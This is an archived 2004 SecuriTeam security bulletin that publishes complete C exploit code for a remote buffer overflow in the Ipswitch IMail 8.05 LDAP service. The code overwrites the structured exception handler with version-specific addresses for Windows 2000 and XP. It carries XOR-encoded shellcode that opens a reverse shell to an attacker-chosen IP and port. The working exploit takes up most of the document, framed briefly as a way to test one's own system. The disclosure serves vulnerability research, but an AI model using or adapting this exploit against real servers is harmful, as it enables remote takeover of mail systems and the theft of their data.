[EXPL] Ipswitch IMail LDAP Remote Exploit
From: SecuriTeam (support_at_securiteam.com)
Date: 02/22/04
- Previous message: SecuriTeam: "[NEWS] PSOProxy Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 22 Feb 2004 12:44:01 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Ipswitch IMail LDAP Remote Exploit
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article:
<http://www.securiteam.com/windowsntfocus/5JP0B2AC0Y.html> Ipswitch IMail
LDAP Daemon Remote Buffer Overflow, a vulnerability in Ipswitch's IMail
allows remote attackers to overflow an internal buffer causing it to
execute arbitrary code. The following exploit code can be used to test
your system for the mentioned vulnerability.
DETAILS
Exploit:
/******************************************************************/
/* [Crpt] iMail v8.05 LDAP service remote sploit by kralor [Crpt] */
/******************************************************************/
/* *** iDefense */
/* *** k-otik */
/* *** private exploits */
/* in other words, *** you all security money makers and */
/* private exploits exchangers. */
/* lolo xXx for her patience while these long nights coding */
/* and for errr.. you know what :) */
/******************************************************************/
/* informations: www.coromputer.net,irc undernet #coromputer */
/******************************************************************/
#include < stdio.h>
#include < stdlib.h>
#include < string.h>
#include < windows.h>
#include < winsock.h>
#pragma comment (lib,"ws2_32")
// EBP+~0xB6 (ebp+ecx-4) (Structed Exception Handler)
#define SEH_ADDR 0x50FFFFFF
/* for win2k offset:
--- jmp dword ptr [ebx]
*/
#define HIJACKED_2K_EVL 0x0043BD8B // (8.05 eval)
#define HIJACKED_2K_EXP 0x1000F7B0 // (8.05 express)
#define HIJACKED_2K_PRO 0x1000F7A9 // (8.05 pro (not sure :)))
/* for winXP offset:
--- pop esi
--- pop ebx
--- ret
*/
#define HIJACKED_XP_EVL 0x0041F5C7 // (8.05 eval)
#define HIJACKED_XP_EXP 0x100106BC // (8.05 express)
#define HIJACKED_XP_PRO 0x100103CC // (8.05 pro) (not sure :)))
// sequence of 4 opcodes
#define HOP 0xd4 // host opcode
#define POP 0xd7 // port opcode
int cnx(char *host, int port)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;
sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons((u_short)port);
if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}
void banner(void)
{
printf("\r\n [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit
by kralor [Crpt]\r\n");
printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}
void syntax(char *prog)
{
printf("\r\nsyntax: %s < host> < your_ip> < your_port> < version>
[OSver]\r\n\r\n",prog);
printf("< version>\t0\t8.05 professional\r\n");
printf(" \t1\t8.05 express\r\n");
printf(" \t2\t8.05 evaluation\r\n---\r\n");
printf("[OSver] \t0\twindows 2000 universal [default]\r\n");
printf(" \t1\twindows XP universal\r\n");
exit(0);
}
int main(int argc, char *argv[])
{
int sock,bytes,target,osver=0;
WSADATA wsaData;
char buffer[8095];
unsigned long host,port;
unsigned int i;
char req1[] =
"\x30\x82" /* bind request */
"\x0a\x3d" /* bind req len */
/* msg id */
"\x02" /* integer */
"\x01" /* length */
"\x01" /* value */
"\x60" /* bind request */
"\x82" /* msg length 2bytes */
"\x01\x36" /* msg length */
/* LDAP ver */
"\x02" /* integer */
"\xff" /* length */
"\x03" /* value */
"\x05\x00" /* DN NULL */
"\x80\x00"; /* Auth simple */
char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */
/* classic xorer */
"\x90"
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
"\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
/* reverse remote shell */
"\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95"
"\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8"
"\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6"
"\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c"
"\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4"
"\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95"
"\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85"
"\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3"
"\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1"
"\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1"
"\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1"
"\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4"
"\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd"
"\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e"
"\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e"
"\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6"
"\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1"
"\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96"
"\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce"
"\x57\x91\x95";
banner();
if(argc< 5||argc>6)
syntax(argv[0]);
host=inet_addr(argv[2])^0x95959595;
port=atoi(argv[3]);
if(!isdigit(argv[4][0])||strlen(argv[4])>1) {
printf("error: < version> must be one digit\r\n");
syntax(argv[0]);
return -1;
}
target=atoi(argv[4]);
if(target< 0||target>2) {
printf("error: < version> must be 0, 1 or 2\r\n");
syntax(argv[0]);
return -1;
}
if(argc==6) {
if(!isdigit(argv[5][0])||strlen(argv[5])>1) {
printf("error: [OSver] must be one digit\r\n");
syntax(argv[0]);
return -1;
}
osver=atoi(argv[5]);
if(osver< 0||osver>1) {
printf("error: [OSver] must be or 1\r\n");
syntax(argv[0]);
return -1;
}
}
if(port< =0||port>65535) {
printf("error: < port> must be between 1 and 65535\r\n");
syntax(argv[0]);
return -1;
}
port=htons((unsigned short)port);
port=port< < 16;
port+=0x0002;
port=port^0x95959595;
for(i=0;i< sizeof(shellc0de);i++) {
if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
if((unsigned char)shellc0de[i+2]==HOP&&(unsigned
char)shellc0de[i+3]==HOP) {
memcpy(&shellc0de[i],&host,4);
host=0;
}
if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
if((unsigned char)shellc0de[i+2]==POP&&(unsigned
char)shellc0de[i+3]==POP) {
memcpy(&shellc0de[i],&port,4);
port=0;
}
}
if(host||port) {
printf("error: unabled to find ip/port sequence in shellc0de\r\n");
return -1;
}
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error: unable to load winsock\r\n");
return -1;
}
sock=cnx(argv[1],389);
if(!sock)
return -1;
/* < ----- magic packet -----> */
strncpy(buffer,req1,13);
memset(&buffer[13],0x90,7010);
*(unsigned long*)&buffer[13] = SEH_ADDR;
if(!osver) {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_2K_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_2K_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_2K_EVL;
} else {
if(!target)
*(unsigned long*)&buffer[17] = HIJACKED_XP_PRO;
else if(target==1)
*(unsigned long*)&buffer[17] = HIJACKED_XP_EXP;
else
*(unsigned long*)&buffer[17] = HIJACKED_XP_EVL;
}
*(unsigned long*)&buffer[21] = 0x90909013; // to avoid 0x00 < unwanted
instructions> on winXP
memcpy(&buffer[200],shellc0de,sizeof(shellc0de)-1);
memcpy(&buffer[7000+23],&req1[10],4);
printf("[+] Sending magic packet ...");
bytes=send(sock,buffer,sizeof(buffer)-1,0);
printf("Done\r\n");
if(bytes==0) { printf("error: send()\r\n"); }
closesocket(sock);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:kralor@coromputer.net> Iv?n
Rodriguez Almui?a.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] PSOProxy Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NEWS] Outgun Multiple Vulnerabilities (Multiple DoS, Multiple Buffer Overflows)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Multiple Buffer Overflows)
... The buffers in which the server stores these two strings have a size of 64 ...
int alen, ulen; ... (Securiteam) - [UNIX] Cfengine Remotely Exploitable Buffer Overflow (net.c)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... cfservd daemon in Cfengine
2.x prior to version 2.0.8. ... unsigned int len = 0; ... void getshell;
... (Securiteam) - [NT] Stronghold DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... In the packet used for joining
the server is locatd the client's nickname ... unsigned char *gssdkcr( ...
void show_info(u_char *data, int len); ... (Securiteam) - [UNIX] Remote Format String Vulnerabilities in eXtremail Server (MAIL FROM, Reappearing)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... to promote the most advanced
vulnerability assessment solutions today. ... int send_sock; ... strncat (buf,
"a", 1); ... (Securiteam) - [NT] eTrust Secure Content Manager Denial of Service
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... int putxx(u8 *data, u32
num, int bits); ... send(sd, buff, p - buff, 0); ... (Securiteam)
